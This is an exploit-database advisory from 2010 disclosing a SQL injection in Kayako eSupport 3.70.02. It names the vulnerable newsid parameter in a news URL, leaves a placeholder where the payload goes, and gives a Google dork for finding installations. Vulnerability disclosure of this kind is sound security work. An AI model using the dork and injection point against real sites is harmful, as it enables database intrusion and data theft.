Kayako eSupport 3.70.02 - SQL Injection

EDB-ID:

14392


Platform:

PHP

Published:

2010-07-17

Name :Kayako eSupport v3.70.02 SQL Injection Vulnerability
Date : july 17,2010
Critical Level 	: HIGH
vendor URL :http://www.kayako.com/solutions/esupport/
google dork:Help Desk Software by Kayako SupportSuite v3.70.02 
Author : Sid3^effects aKa HaRi 
special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,MA1201,KeDar,Sonic,gunslinger_,SeeMe,RoadKiller 
greetz to :www.topsecure.net ,All ICW members and my friends :) luv y0 guyz 
#######################################################################################################
Description:
eSupport incorporates Kayako's leading ticket and e-mail management support desk software, including knowledgebase, troubleshooter, news and downloads publishing tools.
#######################################################################################################
Xploit:SQli Vulnerability

http://[site]/supportsuite/index.php?_m=news&_a=viewnews&newsid=[Sqli]
#######################################################################################################
# 0day no more 
# Sid3^effects